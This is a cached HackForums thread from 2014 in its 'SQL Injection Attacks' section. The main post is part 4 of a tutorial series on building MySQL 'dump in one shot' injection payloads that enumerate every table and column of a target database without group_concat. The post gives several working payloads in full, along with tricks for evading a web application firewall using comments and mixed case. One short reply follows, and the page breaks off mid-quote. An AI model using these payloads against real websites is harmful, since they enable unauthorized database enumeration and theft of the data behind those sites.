<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4040708" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4040708" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4040708</a>. It is a snapshot of the page as it appeared on 15 Apr 2014 12:56:13 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4040708" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:1kQV--CsRTsJ:www.hackforums.net/showthread.php%3Ftid%3D4040708&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi Tutorial] playing with "dump in one shot" syntax - part #4 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi Tutorial] playing with &quot;dump in one shot&quot; syntax - part #4"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4040708"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-15-2014, 04:56 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/logo_bl.gif" alt="" title="Hack Forums ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page."></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi Tutorial] playing with "dump in one shot" syntax - part #4</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4040708" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/rating.js"></script><div id="success_rating_4040708" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4040708"><li style="width: 0%" class="current_rating" id="current_rating_4040708">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4040708&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4040708&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4040708&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4040708&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4040708&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4040708" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4040708_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4040708" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4040708&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4040708");
// -->
</script><div><strong>[SQLi Tutorial] playing with "dump in one shot" syntax - part #4</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid38131855" id="pid38131855"></a><table class="tborder" style="border-top-width: 0; " id="post_38131855" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-04-2014, 03:45 PM <span id="edited_by_38131855"><span class="smalltext">(This post was last modified: 02-04-2014 04:03 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38131855#pid38131855">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,237<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38131855">I decided to continue my series <span style="font-weight: bold;"><span style="color: #FFA500;">dump in one shot</span></span> tutorials. Credits for that goes to Blackhawk. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">part #1 of this tutorial</span></a> we learned how to compose complex command and how to use syntax "dump in one shot" to overcome <span style="color: #00BFFF;">group_concat</span> limit of 1024 characters.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">part #2</span></a> we learned how to display total number of databases, total number of tables, all table names and columns count for each table.<br><br>In <a href="http://www.hackforums.net/showthread.php?tid=3567217" target="_blank"><span style="text-decoration: underline;">part #3</span></a> we learned how to compose SQLi command which will give us number of records for each table in database.<br><br>In this part we will learn how can we control iterations in <span style="color: #00BFFF;">dump in one shot</span> syntax and how to display only things we want.<br><br>This tutorial is related to <span style="font-weight: bold;"><span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4007954" target="_blank">challenge #87</a></span></span> where task (among others) was:<ul><li>display
 left aligned numbered list of all tables in primary database with data 
about records count and columns count in each table</li> <li>under each 
table display numbered list of all columns in that table. List should be
 left aligned with table name of those columns (one line above columns)</li> <li>if table records count is over 5000 records all data from that table should be in <span style="color: #FF0000;">red color</span></li> <li>if table records count is 0 records all data from that table should be in <span style="color: #32CD32;">green color</span>. In other cases tables data should be in <span style="color: black;">black color</span><br></li></ul>We covered each of that topic described in tasks in my previous tutorials, so challenge was not so hard. I suppose only rule <span style="font-weight: bold;"><span style="color: #FF0000;">we may not use group_concat in our syntax</span></span> made it hard(er).<br><br><span style="font-weight: bold;"><span style="color: #FFD700;">So in this tutorial I will limit my explanation to that part of the challenge.</span></span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;"><span style="font-size: x-large;">Injection - basic stuff</span></span></span><br><br>We can easily find our injection is string based and there is only one column. There is simple WAF on <span style="color: #FFD700;">Union</span>, <span style="color: #FFD700;">Concat</span>, <span style="color: #FFD700;">Group_Concat</span>, <span style="color: #FFD700;">information_schema</span>. We can bypass it with comments and lowercase/uppercase characters...<br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #FFA500;">Displaying tables</span></span></span><br><br>For displaying numbered list of all <span style="font-weight: bold;"><span style="color: #32CD32;">147</span></span> tables in primary database we would normally use this <span style="color: #00BFFF;">dump in one shot</span> <span style="color: #FF1493;">syntax</span>:<br><br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),(select(0)<br></span><span style="color: #32CD32;">from(/*!information_schema*/.tables)where(table_schema=database())</span><br><span style="color: #FF1493;">and(0x00)in(@x:=/*!Concat(*/@x,'&lt;br&gt;',LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,<br>table_name))))x)</span><br><br>Part in <span style="color: #32CD32;">green</span> is used to control iterations of our <span style="color: #00BFFF;">dump in one shot</span> output. Modifying it we control how many iteration there will be. <span style="text-decoration: underline;">Please remember that part </span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"> because later we will change it...<br><br>Using our command all <span style="font-weight: bold;"><span style="color: #32CD32;">147</span></span> tables become part of the output.<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/a49ff365ba8c72fef45b87f2ed481a62.jpg" alt="[Image: a49ff365ba8c72fef45b87f2ed481a62.jpg]" border="0"><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #FFA500;">Displaying columns for each table</span></span></span><br><br>Usually if we want to display columns from each table we will simple use <span style="color: #00BFFF;">group_concat</span>. For it we need also table name so we will introduce local variable <span style="font-weight: bold;"><span style="color: #32CD32;">@tbl</span></span> where table name will be stored in each iteration. Our modified <span style="color: #FF1493;">command</span> will be:<br><br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),(select(0)<br>from(/*!information_schema*/.tables)where(table_schema=database())<br>and(0x00)in(@x:=/*!Concat(*/@x,'&lt;br&gt;',LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,</span><br><span style="color: #FFD700;">@tbl:=table_name, '&lt;br&gt;',<br>(select /*!Group_Concat(*/column_name) from /*!information_schema*/.columns where table_schema=database() and table_name=@tbl)</span><br><span style="color: #FF1493;">))))x)</span><br><br>Modified part to display columns for each table is in <span style="color: #FFD700;">yellow</span> color. And we get columns under each table:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/e67f750c1241badfadf1504ed6852e54.jpg" alt="[Image: e67f750c1241badfadf1504ed6852e54.jpg]" border="0"><br><br>But by challenge rules <span style="color: #FF0000;">we may not use</span> group_concat <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/nono.gif" style="vertical-align: middle;" alt="Nono" title="Nono" border="0"> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #FFA500;">Time for new logic</span></span></span><br><br>Let's think. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/omg.gif" style="vertical-align: middle;" alt="Omg" title="Omg" border="0"> We used <span style="color: #FFD700;">information_schema.tables</span>
 in our syntax so far because we want to iterate between all tables in 
primary database. That was logical decision if we could use <span style="color: #00BFFF;">group_concat</span> later.<br><br>Where else can we find all data we need? Of course in <span style="color: #32CD32;">information_schema.columns</span> table. Let's modify our syntax and replace <span style="color: #FFD700;">tables</span> table with <span style="color: #32CD32;">columns</span> table.<br><br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),(select(0)<br>from(/*!information_schema*/.</span><span style="color: #32CD32;">columns</span><span style="color: #FF1493;">)where(table_schema=database())<br>and(0x00)in(@x:=/*!Concat(*/@x,'&lt;br&gt;',LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,<br>table_name, ' --&gt; ', column_name))))x)</span><br><br>and we get:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/6e6bf95c0271a86bad573c353ff5efa3.jpg" alt="[Image: 6e6bf95c0271a86bad573c353ff5efa3.jpg]" border="0"><br><br>Hmm,
 table numbering part is not correct and table name is displayed as many
 times as there are columns in table. Because we change range of 
iterations <span style="color: #FFD700;">from all tables in primary database</span> (in syntax used before) to <span style="color: #32CD32;">all columns in primary database (latest syntax).</span> Let's correct that...<br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #FFA500;">Limit displaying of table names</span></span></span><br><br>We must add some logic to display table name only once. We will use function if() - see my <a href="http://www.hackforums.net/showthread.php?tid=3588441" target="_blank"><span style="text-decoration: underline;">tutorial</span></a>.<br><br>MySQL IF() function returns a value based on a condition. Syntax is as follows:<br><br><span style="font-weight: bold;"><span style="color: #FF1493;">IF(</span></span><span style="color: #00BFFF;">some_expression</span>, <span style="color: #32CD32;">return_if_some_expression_is_TRUE</span>, <span style="color: #FFD700;">return_if_some_expression_is_FALSE</span><span style="font-weight: bold;"><span style="color: #FF1493;">)</span></span><br><br>Our limit part will be:<br><span style="font-weight: bold;"><span style="color: #FF1493;">IF(</span></span> <span style="color: #00BFFF;">(@tbl!=table_name)</span> , <span style="color: #32CD32;">"return numbering with new table name"</span>, <span style="color: #FFD700;">0x00</span> <span style="font-weight: bold;"><span style="color: #FF1493;">)</span></span><br><br>As
 I already explained we are storing table name to local variable @tbl in
 each iteration. We can use it for comparison with table name from 
information_schema.columns in each iteration.<br><br><span style="font-weight: bold;"><span style="text-decoration: underline;">Command above can be read:</span></span> if we have new table name (<span style="color: #00BFFF;">@tbl != table_name</span>) then display <span style="color: #32CD32;">numbering part for tables and new table name</span>. Otherwise <span style="color: #FFD700;">don't display nothing</span> (because we are still at the same table name and we don't want to be displayed more than once).<br><br>Our modified syntax will be:<br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),</span><span style="color: #32CD32;">(@tbl:=0x00)</span><span style="color: #FF1493;">,(select(0)<br>from(/*!information_schema*/.columns)where(table_schema=database())<br>and(0x00)in(@x:=/*!Concat(*/@x,'&lt;br&gt;',</span><br><span style="color: #32CD32;">if( (@tbl!=table_name), /*!Concat(*/LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,@tbl:=table_name), 0x00)</span><br><span style="color: #FF1493;">))))x)</span><br>Changes needed for limiting display of table name are in <span style="color: #32CD32;">green</span> color.<br><br>And we will get a numbered list with all 147 table names as in picture 1 on top.<br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #FFA500;">Adding column names </span></span></span><br><br>We must add column names after each table name. That part is easy. We simply add column_name after our <span style="font-size: large;"><span style="font-weight: bold;">if()</span></span> statement like:<br><br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)<br>from(/*!information_schema*/.columns)where(table_schema=database())<br>and(0x00)in(@x:=/*!Concat(*/@x, '&lt;br&gt;',<br>if( (@tbl!=table_name), /*!Concat(*/LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,@tbl:=table_name,</span><span style="color: #32CD32;">'&lt;br&gt;'</span><span style="color: #FF1493;">), 0x00)</span><span style="color: #32CD32;">, column_name</span><br><span style="color: #FF1493;">))))x)</span><br><br>Our result will be:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/84849ace4d827fcb9ff43f0eb1a6e039.jpg" alt="[Image: 84849ace4d827fcb9ff43f0eb1a6e039.jpg]" border="0"><br>After each numbered table name there are its column names.<br><br>Lets
 add numbering part for columns and left alignment of columns with table
 name. For numbering of columns we will introduce new local variable (<span style="color: #32CD32;">@z:=0x00</span>). We will reset it to 0 after each new table name. Before each column name we will add+1 to it.<br><br>For alignment of columns we can use hard space <span style="color: #32CD32;">&amp;nbsp;</span> (you will need a small trick to display it correctly) or we can use <span style="color: #32CD32;">&lt;div style="margin-left:30px;"&gt;</span>:<br><br><span style="color: #FF1493;">(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)<br>from(/*!information_schema*/.columns)where(table_schema=database())<br>and(0x00)in(@x:=/*!Concat(*/@x, '&lt;br&gt;',<br>if(
 (@tbl!=table_name), 
/*!Concat(*/'&lt;/div&gt;',LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,@tbl:=table_name,
 '&lt;br&gt;',</span><span style="color: #32CD32;">(@z:=0x00),'&lt;div style="margin-left:30px;"&gt;'</span><span style="color: #FF1493;"> ), 0x00),</span> <span style="color: #32CD32;">lpad(@z:=@z%2b1,2,'0') , '. ',</span> <span style="color: #FF1493;">column_name<br>))))x)</span><br><br>and columns are numbered starting with 1 with each new table and left aligned with table name.<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/7fbff21ae4e1a8dd1afe4962adf233e8.jpg" alt="[Image: 7fbff21ae4e1a8dd1afe4962adf233e8.jpg]" border="0"><br><br>Thanks for reading <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br><span style="color: #FF0000;"><span style="font-weight: bold;">WARNING</span></span><br>I hope you know about famous HF copy/paste problem with hidden characters. So my advice is: <span style="color: #FFD700;">open
 source of web page (click with right mouse button on page and select 
option View Page Source), locate command there and copy it from there. </span>In source code window those bug characters are visible in red color (see red rectangle on picture bellow).<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/1830dd08be981434974ae6a6ed35e4a4.jpg" alt="[Image: 1830dd08be981434974ae6a6ed35e4a4.jpg]" border="0"><br><span style="color: #32CD32;"><span style="font-weight: bold;">Delete them before running the command.</span></span></div><div class="post_meta" id="post_meta_38131855"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=4040708&amp;replyto=38131855" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid38139024" id="pid38139024"></a><table class="tborder" style="margin-top: 5px; " id="post_38139024" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">02-04-2014, 05:04 PM <span id="edited_by_38139024"><span class="smalltext">(This post was last modified: 02-04-2014 05:17 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278">t.pro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4040708&amp;pid=38139024#pid38139024">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/avatar_1846278.jpg" alt="" height="48" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1846278"><span class="group9">t.pro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">0x742e50524f203b2d29<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 21<br>Posts: 401<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1846278"><strong class="reputation_positive">43</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_38139024">THUMBS UP FOR THAT.<br><br>Very helpful like usual!<br><br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%234%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><hr><br><blockquote><cite><span>(02-04-2014 03:45 PM)</span>ajkaro Wrote: <a href="http://www.hackforums.net/showthread.php?pid=38131855#pid38131855" class="quick_jump">►</a></cite>Where else can we find all data we need? Of course in <span style="color: #32CD32;">information_schema.columns</span> table.</blockquote><br>i tried that way many times, but still was the problem with:<br><br><blockquote><cite><span>(02-04-2014 03:45 PM)</span>ajkaro 